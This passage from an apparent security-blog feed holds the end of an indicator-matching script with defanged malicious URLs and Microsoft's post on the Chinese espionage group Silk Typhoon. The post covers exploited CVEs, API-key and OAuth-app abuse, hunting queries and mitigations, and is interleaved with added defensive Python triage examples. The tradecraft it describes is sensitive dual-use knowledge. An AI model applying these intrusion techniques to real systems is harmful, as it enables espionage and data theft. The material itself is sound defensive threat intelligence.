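    text = re.sub(r"^hxxp(s?)://", r"http\1://", text, flags=re.IGNORECASE)
    return text.replace("[.]", ".").replace("[:]", ":")


def indicator_key(indicator):
    """Reduce an indicator (IP, domain or URL) to ('ip', addr) or ('domain', host)."""
    text = refang(indicator)
    if "://" in text:
        text = urlsplit(text).hostname or ""
    text = text.lower().rstrip(".")
    try:
        return ("ip", str(ipaddress.ip_address(text)))
    except ValueError:
        return ("domain", text)


def build_watchlist(indicators):
    watch = {"ip": set(), "domain": set()}
    for indicator in indicators:
        kind, value = indicator_key(indicator)
        watch[kind].add(value)
    return watch


def domain_matches(host, domains):
    """True if host equals a watched domain or is a subdomain of one (never a bare TLD)."""
    labels = host.lower().rstrip(".").split(".")
    return any(".".join(labels[i:]) in domains for i in range(len(labels) - 1))


def match_log_line(line, watch):
    """Return [(field, value), ...] for every field of the line that hits the watchlist."""
    fields = dict(TOKEN.findall(line))
    hits = []
    for field in ("query", "dst", "url"):
        raw = fields.get(field)
        if not raw:
            continue
        if field == "url":
            host = urlsplit(raw).hostname or ""
        elif field == "dst":
            host = raw.rsplit(":", 1)[0]  # strip the port; IPv4 only in this sample
        else:
            host = raw
        kind, value = indicator_key(host)
        if kind == "ip" and value in watch["ip"]:
            hits.append((field, value))
        elif kind == "domain" and domain_matches(value, watch["domain"]):
            hits.append((field, value))
    return hits


def scan(lines, indicators):
    """Return [(line_index, hits)] for the lines with at least one indicator match."""
    watch = build_watchlist(indicators)
    results = []
    for index, line in enumerate(lines):
        hits = match_log_line(line, watch)
        if hits:
            results.append((index, hits))
    return results


if __name__ == "__main__":
    for index, hits in scan(SAMPLE_LOG_LINES, SAMPLE_INDICATORS):
        print(index, SAMPLE_LOG_LINES[index], hits)
```

URL indicators are matched on their host only, which is deliberate: the paths in the C2 URLs above change between campaigns while the host is what a DNS or proxy log records. Subdomain matching is walked label by label so that a lookalike such as keikochio.com.example.test does not match.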

Fourth-stage testing connectivity sites

  • hxxps://baidu.com (URL)
  • hxxps://360.net (URL)
  • hxxps://praxlonfire73.live (URL)

Learn more

For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog: https://aka.ms/threatintelblog.

To get notified about new publications and to join discussions on social media, follow us on LinkedIn at https://www.linkedin.com/showcase/microsoft-threat-intelligence, and on X (formerly Twitter) at https://x.com/MsftSecIntel.

Hear more about this discovery and how threat actors in this campaign leverage trusted platforms and advanced techniques to achieve their malicious goals in this episode of the Microsoft Threat Intelligence podcast, hosted by Sherrod DeGrippo: https://thecyberwire.com/podcasts/microsoft-threat-intelligence/39/notes. To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast: https://thecyberwire.com/podcasts/microsoft-threat-intelligence.

The post Malvertising campaign leads to info stealers hosted on GitHub appeared first on Microsoft Security Blog.

Silk Typhoon targeting IT supply chain

Microsoft Malware Protection Center - Wed, 03/05/2025 - 6:00am

Executive summary:
Microsoft Threat Intelligence identified a shift in tactics by Silk Typhoon, a Chinese espionage group, now targeting common IT solutions like remote management tools and cloud applications to gain initial access. While they haven’t been observed directly targeting Microsoft cloud services, they do exploit unpatched applications that allow them to elevate their access in targeted organizations and conduct further malicious activities. After successfully compromising a victim, Silk Typhoon uses the stolen keys and credentials to infiltrate customer networks where they can then abuse a variety of deployed applications, including Microsoft services and others, to achieve their espionage objectives. Our latest blog explains how Microsoft security solutions detect these threats and offers mitigation guidance, aiming to raise awareness and strengthen defenses against Silk Typhoon’s activities.

Silk Typhoon is an espionage-focused Chinese state actor whose activities indicate that they are a well-resourced and technically efficient group with the ability to quickly operationalize exploits for discovered zero-day vulnerabilities in edge devices. This threat actor holds one of the largest targeting footprints among Chinese threat actors. Part of this is due to their opportunistic nature of acting on discoveries from vulnerability scanning operations, moving quickly to the exploitation phase once they discover a vulnerable public-facing device that they could exploit.

As a result, Silk Typhoon has been observed targeting a wide range of sectors and geographic regions, including but not limited to information technology (IT) services and infrastructure, remote monitoring and management (RMM) companies, managed service providers (MSPs) and affiliates, healthcare, legal services, higher education, defense, government, non-governmental organizations (NGOs), energy, and others located in the United States and throughout the world.

Silk Typhoon has shown proficiency in understanding how cloud environments are deployed and configured, allowing them to successfully move laterally, maintain persistence, and exfiltrate data quickly within victim environments. Since Microsoft Threat Intelligence began tracking this threat actor in 2020, Silk Typhoon has used a myriad of web shells that allow them to execute commands, maintain persistence, and exfiltrate data from victim environments.

As with any observed nation-state threat actor activity, Microsoft has directly notified targeted or compromised customers, providing them with important information needed to secure their environments. We’re publishing this blog to raise awareness of Silk Typhoon’s recent and long-standing malicious activities, provide mitigation and hunting guidance, and help disrupt operations by this threat actor.

Recent Silk Typhoon activity

Supply chain compromise

Since late 2024, Microsoft Threat Intelligence has conducted thorough research and tracked ongoing attacks performed by Silk Typhoon. These efforts have significantly enhanced our understanding of the actor's operations and uncovered new tradecraft used by the actor. In particular, Silk Typhoon was observed abusing stolen API keys and credentials associated with privileged access management (PAM), cloud app providers, and cloud data management companies, allowing the threat actor to access these companies' downstream customer environments. Companies within these sectors are possible targets of interest to the threat actor. The following activity was observed once Silk Typhoon had successfully stolen the API key:

  • Silk Typhoon used stolen API keys to access downstream customers/tenants of the initially compromised company.
  • Leveraging access obtained via the API key, the actor performed reconnaissance and data collection on targeted devices via an admin account. Data of interest overlaps with China-based interests, US government policy and administration, and legal process and documents related to law enforcement investigations.
  • Additional tradecraft identified included resetting of default admin account via API key, web shell implants, creation of additional users, and clearing logs of actor-performed actions.
  • Thus far the victims of this downstream activity were largely in the state and local government, and the IT sector.

Password spray and abuse

Silk Typhoon has also gained initial access through successful password spray attacks and other password abuse techniques, including discovering passwords through reconnaissance. In this reconnaissance activity, Silk Typhoon leveraged corporate passwords that had leaked to public repositories such as GitHub and successfully authenticated to the corresponding corporate account. This demonstrates the level of effort the threat actor puts into research and reconnaissance to collect victim information, and it highlights the importance of password hygiene and of multifactor authentication (MFA) on all accounts.

Silk Typhoon TTPs

Initial access

Silk Typhoon has pursued initial access attacks against targets of interest through development of zero-day exploits or discovering and targeting vulnerable third-party services and software providers. Silk Typhoon has also been observed gaining initial access via compromised credentials. The software or services targeted for initial access focus on IT providers, identity management, privileged access management, and RMM solutions.

In January 2025, Silk Typhoon was also observed exploiting a zero-day vulnerability in the public-facing Ivanti Pulse Connect VPN (CVE-2025-0282). Microsoft Threat Intelligence Center reported the activity to Ivanti, which led to a rapid resolution of the critical vulnerability, significantly reducing the period during which highly skilled and sophisticated threat actors could leverage the exploit.

Lateral movement to cloud

Once a victim has been successfully compromised, Silk Typhoon is known to utilize common yet effective tactics to move laterally from on-premises environments to cloud environments. Once the threat actor has gained access to an on-premises environment, they look to dump Active Directory, steal passwords within key vaults, and escalate privileges. Furthermore, Silk Typhoon has been observed targeting Microsoft AADConnect servers in these post-compromise activities. AADConnect (now Entra Connect) is a tool that synchronizes on-premises Active Directory with Entra ID (formerly Azure AD). A successful compromise of these servers could allow the actor to escalate privileges, access both on-premises and cloud environments, and move laterally.

Manipulating service principals/applications

While analyzing post-compromise tradecraft, Microsoft identified Silk Typhoon abusing service principals and OAuth applications with administrative permissions to perform email, OneDrive, and SharePoint data exfiltration via MSGraph. Throughout their use of this technique, Silk Typhoon has been observed gaining access to an application that was already consented within the tenant to harvest email data and adding their own passwords to the application. Using this access, the actors can steal email information via the MSGraph API. Silk Typhoon has also been observed compromising multi-tenant applications, potentially allowing the actors to move across tenants, access additional resources within the tenants, and exfiltrate data.

If the compromised application had privileges to interact with the Exchange Web Services (EWS) API, the threat actors were seen compromising email data via EWS.

In some instances, Silk Typhoon was seen creating Entra ID applications in an attempt to facilitate this data theft. The actors would typically name the application in a way to blend into the environment by using legitimate services or Office 365 themes.

Use of covert networks

Silk Typhoon is known to utilize covert networks to obfuscate their malicious activities. Covert networks, tracked by Microsoft as “CovertNetwork”, refer to a collection of egress IPs consisting of compromised or leased devices that may be used by one or more threat actors. Silk Typhoon was observed utilizing a covert network that is comprised of compromised Cyberoam appliances, Zyxel routers, and QNAP devices. The use of covert networks has become a common tactic among various threat actors, particularly Chinese threat actors.

Historical Silk Typhoon zero-day exploitation

Since 2021, Silk Typhoon has been observed targeting and compromising vulnerable unpatched Microsoft Exchange servers, GlobalProtect Gateway on Palo Alto Networks firewalls, Citrix NetScaler appliances, Ivanti Pulse Connect Secure appliances, and others. While not exhaustive, below are historical zero-day vulnerabilities that Silk Typhoon was observed compromising for initial access into victim environments.

GlobalProtect Gateway on Palo Alto Networks Firewalls

In March 2024, Silk Typhoon used a zero-day exploit for CVE-2024-3400 in GlobalProtect Gateway on Palo Alto Networks firewalls to compromise multiple organizations:

  • CVE-2024-3400 – A command injection as a result of arbitrary file creation vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall.

Citrix NetScaler ADC and NetScaler Gateway

In early 2024, Microsoft began to observe Silk Typhoon compromising zero-day vulnerabilities within Citrix NetScaler ADC and NetScaler Gateways:

  • CVE-2023-3519 – An unauthenticated remote code execution (RCE) vulnerability affecting NetScaler (formerly Citrix) Application Delivery Controller (ADC) and NetScaler Gateway

Microsoft Exchange Servers

In January 2021, Microsoft began to observe Silk Typhoon compromising zero-day vulnerabilities in Microsoft Exchange Servers. Upon discovery, Microsoft addressed those issues and issued security updates along with related guidance (related links below):

  • CVE-2021-26855 – A server-side request forgery (SSRF) vulnerability in Exchange that could allow an attacker to send arbitrary HTTP requests and authenticate as the Exchange server.
  • CVE-2021-26857 – An insecure deserialization vulnerability in the Unified Messaging service. Insecure deserialization is where untrusted user-controllable data is deserialized by a program. Exploiting this vulnerability gave Silk Typhoon the ability to run code as SYSTEM on the Exchange server. This requires administrator permission or another vulnerability to be exploited.
  • CVE-2021-26858 – A post-authentication arbitrary file write vulnerability in Exchange. If Silk Typhoon could authenticate with the Exchange server, then it could use this vulnerability to write a file to any path on the server. It could authenticate by exploiting the CVE-2021-26855 SSRF vulnerability or by compromising a legitimate administrator’s credentials.
  • CVE-2021-27065 – A post-authentication arbitrary file write vulnerability in Exchange. If Silk Typhoon could authenticate with the Exchange server, then it could use this vulnerability to write a file to any path on the server. It could authenticate by exploiting the CVE-2021-26855 SSRF vulnerability or by compromising a legitimate administrator’s credentials.

During recent activities and historical exploitation of these appliances, Silk Typhoon utilized a variety of web shells to maintain persistence and to allow the actors to remotely access victim environments.

Hunting guidance

To help mitigate and surface various aspects of Silk Typhoon's recent activities, Microsoft recommends the following:

  • Inspect log activity related to Entra Connect servers for anomalous activity.
  • Where these targeted applications have highly privileged accounts, inspect service principals for newly created secrets (credentials).
  • Identify and analyze any activity related to newly created applications.
  • Identify all multi-tenant applications and scrutinize authentications to them.
  • Analyze any observed activity related to use of Microsoft Graph or eDiscovery, particularly for SharePoint or email data exfiltration.
  • Look for newly created users on devices impacted by vulnerabilities targeted by Silk Typhoon, and investigate virtual private network (VPN) logs for evidence of VPN configuration modifications or sign-in activity during the possible window of compromise of unpatched devices.
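Three of the hunting items above concern Entra ID application identities: service principals that received new secrets, newly created applications, and multi-tenant applications. As an added example that is not code from the Microsoft post, the Python below runs that triage offline over a constructed application inventory and constructed audit records. The record fields, the audit activity names and the application-inventory shape are my assumptions about what an export would look like; the high-privilege permission set is my choice, seeded with the two EWS permissions this post's recommendations name.

```python
from datetime import datetime, timedelta, timezone

# Application permissions treated as high privilege for this triage. The two EWS
# permissions are the ones the post's recommendations call out; the Graph ones
# are my additions for mail, OneDrive and SharePoint access.
HIGH_PRIVILEGE_PERMISSIONS = {
    "EWS.full_access_as_app", "EWS.AccessAsUser.All",
    "Mail.Read", "Mail.ReadWrite", "Files.Read.All", "Sites.Read.All",
}
# Audit-log activity names assumed for credential additions and application creation.
CREDENTIAL_OPERATIONS = {
    "Add service principal credentials",
    "Update application – Certificates and secrets management",
}
APP_CREATION_OPERATIONS = {"Add application", "Add service principal"}
MULTI_TENANT_AUDIENCES = {"AzureADMultipleOrgs", "AzureADandPersonalMicrosoftAccount"}

AS_OF = "2025-03-05T00:00:00Z"  # reference time for the look-back window

# Constructed application inventory (simplified shape of an applications listing).
APP_INVENTORY = [
    {"appId": "00000000-0000-4000-8000-000000000001", "displayName": "HR Sync",
     "signInAudience": "AzureADMyOrg", "appPermissions": ["User.Read.All"]},
    {"appId": "00000000-0000-4000-8000-000000000002", "displayName": "Mail Archiver",
     "signInAudience": "AzureADMyOrg", "appPermissions": ["EWS.full_access_as_app", "Mail.Read"]},
    {"appId": "00000000-0000-4000-8000-000000000003", "displayName": "Office 365 Reporting",
     "signInAudience": "AzureADMultipleOrgs", "appPermissions": ["Sites.Read.All"]},
]

# Constructed audit records (simplified audit-log shape; not real tenant data).
AUDIT_RECORDS = [
    {"activityDateTime": "2025-02-20T02:14:00Z", "operation": "Add service principal credentials",
     "initiatedBy": "svc-backup@contoso.example", "targetAppId": "00000000-0000-4000-8000-000000000002"},
    {"activityDateTime": "2025-02-21T02:30:00Z", "operation": "Add application",
     "initiatedBy": "svc-backup@contoso.example", "targetAppId": "00000000-0000-4000-8000-000000000003"},
    {"activityDateTime": "2024-11-02T10:00:00Z", "operation": "Add service principal credentials",
     "initiatedBy": "admin@contoso.example", "targetAppId": "00000000-0000-4000-8000-000000000001"},
    {"activityDateTime": "2025-02-22T09:00:00Z",
     "operation": "Update application – Certificates and secrets management",
     "initiatedBy": "admin@contoso.example", "targetAppId": "00000000-0000-4000-8000-000000000001"},
]


def parse_time(text):
    return datetime.strptime(text, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def is_high_privilege(app):
    return bool(HIGH_PRIVILEGE_PERMISSIONS & set(app.get("appPermissions", [])))


def new_credentials(records, inventory, as_of=AS_OF, window_days=90):
    """Credential additions inside the window; privileged apps first, then oldest first."""
    apps = {a["appId"]: a for a in inventory}
    cutoff = parse_time(as_of) - timedelta(days=window_days)
    hits = []
    for rec in records:
        if rec["operation"] not in CREDENTIAL_OPERATIONS or parse_time(rec["activityDateTime"]) < cutoff:
            continue
        app = apps.get(rec["targetAppId"], {})  # an unknown appId is itself worth a look
        hits.append({
            "appId": rec["targetAppId"],
            "displayName": app.get("displayName", "<app not in inventory>"),
            "initiatedBy": rec["initiatedBy"],
            "when": rec["activityDateTime"],
            "highPrivilege": is_high_privilege(app),
        })
    return sorted(hits, key=lambda h: (not h["highPrivilege"], h["when"]))


def new_applications(records, as_of=AS_OF, window_days=90):
    cutoff = parse_time(as_of) - timedelta(days=window_days)
    return [r for r in records
            if r["operation"] in APP_CREATION_OPERATIONS and parse_time(r["activityDateTime"]) >= cutoff]


def multi_tenant_apps(inventory):
    return [a for a in inventory if a.get("signInAudience") in MULTI_TENANT_AUDIENCES]


def triage(records=AUDIT_RECORDS, inventory=APP_INVENTORY, as_of=AS_OF):
    return {
        "newCredentials": new_credentials(records, inventory, as_of),
        "newApplications": new_applications(records, as_of),
        "multiTenantApps": multi_tenant_apps(inventory),
    }


if __name__ == "__main__":
    for section, items in triage().items():
        print(section)
        for item in items:
            print("  ", item)
```

The ordering in new_credentials() is the point of the exercise: a secret added to an application that already holds mailbox-wide EWS or Graph permissions is exactly the pattern described under "Manipulating service principals/applications", so it sorts to the top regardless of how recent it is, and the account that added it is carried along for the follow-up sign-in review.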

Microsoft Sentinel

Microsoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with ‘TI map’) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace.

Microsoft Sentinel customers can use the following queries to detect behavior associated with Silk Typhoon:

Customers can use the following query to detect vulnerabilities exploited by Silk Typhoon:

DeviceTvmSoftwareVulnerabilities
| where CveId in ("CVE-2025-0282")
| project DeviceId, DeviceName, OSPlatform, OSVersion, SoftwareVendor, SoftwareName, SoftwareVersion, CveId, VulnerabilitySeverityLevel
| join kind=inner (
    DeviceTvmSoftwareVulnerabilitiesKB
    | project CveId, CvssScore, IsExploitAvailable, VulnerabilitySeverityLevel, PublishedDate, VulnerabilityDescription, AffectedSoftware
) on CveId
| project DeviceId, DeviceName, OSPlatform, OSVersion, SoftwareVendor, SoftwareName, SoftwareVersion, CveId, VulnerabilitySeverityLevel, CvssScore, IsExploitAvailable, PublishedDate, VulnerabilityDescription, AffectedSoftware

Recommendations

To help detect and mitigate Silk Typhoon’s activity, Microsoft recommends the following:

  • Ensure all public-facing devices are patched. Note that patching a vulnerable device does not remediate any post-compromise activity by a threat actor who already gained privileged access to it.
  • Validate that all Ivanti Pulse Connect VPN appliances are patched to address CVE-2025-0282, and run the Integrity Checker Tool as suggested in Ivanti's advisory. Consider terminating any active or persistent sessions following patch cycles.
  • Defend against legitimate application and service principal abuse by establishing strong controls and monitoring for these security identities. Microsoft recommends the following mitigations to reduce the impact of this threat:
    • Audit the current privilege level of all identities, users, service principals, and Microsoft Graph Data Connect applications (use the Microsoft Graph Data Connect authorization portal) to understand which identities are highly privileged. Scrutinize privileges more closely if they belong to an unknown identity, belong to identities that are no longer in use, or are not fit for purpose. Admins may assign identities privileges over and above what is required. Defenders should pay attention to apps with app-only permissions as those apps might have over-privileged access. Read additional guidance for investigating compromised and malicious applications.
    • Identify abused OAuth apps using anomaly detection policies. Detect abused OAuth apps that make sensitive Exchange Online administrative activities through App governance. Investigate and remediate any risky OAuth apps.
    • Review any applications that hold EWS.AccessAsUser.All and EWS.full_access_as_app permissions and understand whether they are still required in the tenant. If they are no longer required, they should be removed.
    • If applications must access mailboxes, granular and scalable access can be implemented using role-based access control for applications in Exchange Online. This access model ensures applications are only granted access to the specific mailboxes they require.
  • Monitor for service principal sign-ins from unusual locations. Two important reports can provide useful daily activity monitoring:
    • The risky sign-ins report surfaces attempted and successful user access activities where the legitimate owner might not have performed the sign-in. 
    • The risky users report surfaces user accounts that might have been compromised, such as a leaked credential that was detected or the user signing in from an unexpected location in the absence of planned travel. 
  • Defend against credential compromise by building credential hygiene, practicing the principle of least privilege, and reducing credential exposure. Microsoft recommends the following mitigations to reduce the impact of this threat:
  • Implement the Azure Security Benchmark and general best practices for securing identity infrastructure, including:
    • Prevent on-premises service accounts from having direct rights to the cloud resources to prevent lateral movement to the cloud.
    • Ensure that “break glass” account passwords are stored offline and configure honey-token activity for account usage.
    • Implement Conditional Access policies enforcing Microsoft’s Zero Trust principles.
  • Enable risk-based user sign-in protection and automate threat response to block high-risk sign-ins from all locations and enable multifactor authentication (MFA) for medium-risk ones.
  • Ensure that VPN access is protected using modern authentication methods.
  • Identify all multi-tenant applications, assess permissions, and investigate suspicious sign-ins.
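The "service principal sign-ins from unusual locations" recommendation above can be turned into a simple baseline-and-deviate check. The following is an added example, not Microsoft’s code: it learns, per service principal, the countries seen in successful sign-ins during a baseline window and then flags later sign-ins (successful or failed) from any other country, or from a principal with no baseline at all. Field names are assumed to follow the Sentinel AADServicePrincipalSignInLogs columns, and the sample events and IP addresses are constructed.

```python
"""Flag Entra service principal sign-ins from countries not seen in a baseline window.
Added example, not Microsoft's code. Field names follow the Sentinel
AADServicePrincipalSignInLogs columns (assumed: TimeGenerated, ServicePrincipalId,
ServicePrincipalName, IPAddress, Location, ResultType)."""
from collections import defaultdict
from datetime import datetime, timedelta

def ev(ts, sp_id, sp_name, ip, country, result="0"):
    """One sign-in record; ResultType "0" is a successful sign-in in Entra logs."""
    return {"TimeGenerated": ts, "ServicePrincipalId": sp_id, "ServicePrincipalName": sp_name,
            "IPAddress": ip, "Location": country, "ResultType": result}

# Constructed sample events (documentation IP ranges, not real indicators).
SAMPLE_SIGNINS = [
    ev("2025-02-01T08:00:00Z", "sp-mail-sync", "Mailbox Sync", "203.0.113.10", "US"),
    ev("2025-02-03T02:00:00Z", "sp-backup", "Nightly Backup", "198.51.100.7", "DE"),
    ev("2025-02-05T08:00:00Z", "sp-mail-sync", "Mailbox Sync", "203.0.113.10", "US"),
    ev("2025-02-09T03:00:00Z", "sp-mail-sync", "Mailbox Sync", "192.0.2.44", "NL", "50126"),  # failed, in baseline
    ev("2025-02-20T08:00:00Z", "sp-mail-sync", "Mailbox Sync", "203.0.113.10", "US"),
    ev("2025-02-21T04:12:00Z", "sp-mail-sync", "Mailbox Sync", "192.0.2.44", "NL", "50126"),
    ev("2025-02-21T04:15:00Z", "sp-mail-sync", "Mailbox Sync", "192.0.2.44", "NL"),
    ev("2025-02-22T02:00:00Z", "sp-backup", "Nightly Backup", "198.51.100.7", "DE"),
    ev("2025-02-23T09:00:00Z", "sp-onboard", "New Automation", "203.0.113.99", "US"),
]

def parse_ts(value):
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ")

def baseline_locations(events, baseline_end):
    """Countries each principal signed in from successfully before baseline_end.
    Only successes count: a failed attempt from a new country must not whitelist it."""
    known = defaultdict(set)
    for e in events:
        if parse_ts(e["TimeGenerated"]) < baseline_end and e["ResultType"] == "0":
            known[e["ServicePrincipalId"]].add(e["Location"])
    return known

def find_unusual_signins(events, baseline_days=14):
    """Post-baseline sign-ins (success or failure) from a country that is new for the
    principal; principals with no baseline at all are reported too."""
    events = sorted(events, key=lambda e: e["TimeGenerated"])  # ISO-8601 sorts lexically
    baseline_end = parse_ts(events[0]["TimeGenerated"]) + timedelta(days=baseline_days)
    known = baseline_locations(events, baseline_end)
    hits = []
    for e in events:
        if (parse_ts(e["TimeGenerated"]) >= baseline_end
                and e["Location"] not in known.get(e["ServicePrincipalId"], set())):
            hits.append((e["TimeGenerated"], e["ServicePrincipalName"], e["IPAddress"],
                         e["Location"], e["ResultType"]))
    return hits
```

Each flagged tuple should be triaged against the risky sign-ins and risky users reports mentioned above; a new country for a long-lived automation identity is exactly the pattern that warrants reviewing the app’s credentials and permissions.
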

Indicators of compromise

Silk Typhoon is not known to use their own dedicated infrastructure in their operations. Typically, the threat actor uses compromised covert networks, proxies, and VPNs for infrastructure, likely to obfuscate their operations. However, they have also been observed using short-lease virtual private server (VPS) infrastructure to support their operations.

Microsoft Defender XDR detections

Microsoft Defender XDR customers can refer to the list of applicable detections below. Microsoft Defender XDR coordinates detection, prevention, investigation, and response across endpoints, identities, email, and apps to provide integrated protection against attacks like the threat discussed in this blog.

Customers with provisioned access can also use Microsoft Security Copilot in Microsoft Defender to investigate and respond to incidents, hunt for threats, and protect their organization with relevant threat intelligence.

Microsoft Defender for Endpoint

The following Microsoft Defender for Endpoint alerts can indicate associated threat activity:

  • Silk Typhoon activity group

The following alerts might also indicate threat activity related to this threat. Note, however, that these alerts can also be triggered by unrelated threat activity.

  • Possible exploitation of Exchange Server vulnerabilities
  • Suspicious web shell detected
  • Suspicious Active Directory snapshot dump
  • Suspicious credential dump from NTDS.dit

Microsoft Defender for Identity

The following Microsoft Defender for Identity alerts can indicate associated threat activity:

  • Suspicious Interactive Logon to the Entra Connect Server
  • Suspicious writeback by Entra Connect on a sensitive user
  • User Password Reset by Entra Connect Account
  • Suspicious Entra sync password change

Microsoft Defender XDR

The following alerts might indicate threat activity related to this threat. Note, however, that these alerts can also be triggered by unrelated threat activity.

  • Suspicious activities related to Azure Key Vault by a risky user

Microsoft Defender for Cloud

The following alerts might indicate threat activity related to this threat. Note, however, that these alerts can also be triggered by unrelated threat activity.

  • Unusual user accessed a key vault
  • Unusual application accessed a key vault
  • Access from a suspicious IP to a key vault
  • Denied access from a suspicious IP to a key vault

Microsoft Defender for Cloud Apps

The following Microsoft Defender for Cloud Apps alerts can indicate associated threat activity if app governance is enabled:

  • Unusual addition of credentials to an OAuth app
  • Suspicious credential added to dormant app
  • Unused app newly accessing APIs
  • App with suspicious metadata has Exchange permission
  • App with an unusual user agent accessed email data through Exchange Web Services
  • App with EWS application permissions accessing numerous emails
  • App made anomalous Graph calls to Exchange workload post certificate update or addition of new credentials
  • Suspicious user created an OAuth app that accessed mailbox items
  • Suspicious OAuth app used for collection activities using Graph API
  • Risky user updated an app that accessed Email and performed Email activity through Graph API
  • Suspicious OAuth app email activity through Graph API
  • Suspicious OAuth app email activity through EWS API

Microsoft Defender Vulnerability Management

Microsoft Defender Vulnerability Management surfaces devices that may be affected by the following vulnerabilities used in this threat:

  • CVE-2021-26855
  • CVE-2021-26857
  • CVE-2021-26858
  • CVE-2021-27065

Microsoft Defender External Attack Surface Management

Attack Surface Insights with the following titles can indicate vulnerable devices on your network but are not necessarily indicative of exploitation:

  • [Potential] CVE-2024-3400 – Palo Alto Networks PAN-OS Command Injection Vulnerability
  • [Potential] CVE-2023-3519 – Citrix NetScaler ADC and Gateway Unauthenticated
  • ProxyLogon – Microsoft Exchange Server Vulnerabilities (Hotfix Available)

Note: An Attack Surface Insight marked as [Potential] indicates that a service is running but cannot validate whether that service is running a vulnerable version. Customers should check the affected resources to verify that they are up to date as part of their investigation.

Microsoft Security Copilot

Security Copilot customers can use the standalone experience to create their own prompts or run the following pre-built promptbooks to automate incident response or investigation tasks related to this threat:

  • Incident investigation
  • Microsoft User analysis
  • Threat actor profile
  • Threat Intelligence 360 report based on MDTI article (see Threat intelligence reports below)
  • Vulnerability impact assessment

Note that some promptbooks require access to plugins for Microsoft products such as Microsoft Defender XDR or Microsoft Sentinel.

Threat intelligence reports

Microsoft customers can use the following reports in Microsoft products to get the most up-to-date information about the threat actor, malicious activity, and techniques discussed in this blog. These reports provide the intelligence, protection information, and recommended actions to prevent, mitigate, or respond to associated threats found in customer environments.

Microsoft Defender Threat Intelligence

Microsoft Security Copilot customers can also use the Microsoft Security Copilot integration in Microsoft Defender Threat Intelligence, either in the Security Copilot standalone portal or in the embedded experience in the Microsoft Defender portal to get more information about this threat actor.

Learn more

For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog: https://aka.ms/threatintelblog.

To get notified about new publications and to join discussions on social media, follow us on LinkedIn at https://www.linkedin.com/showcase/microsoft-threat-intelligence, and on X (formerly Twitter) at https://x.com/MsftSecIntel.

To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast: https://thecyberwire.com/podcasts/microsoft-threat-intelligence.

The post Silk Typhoon targeting IT supply chain appeared first on Microsoft Security Blog.
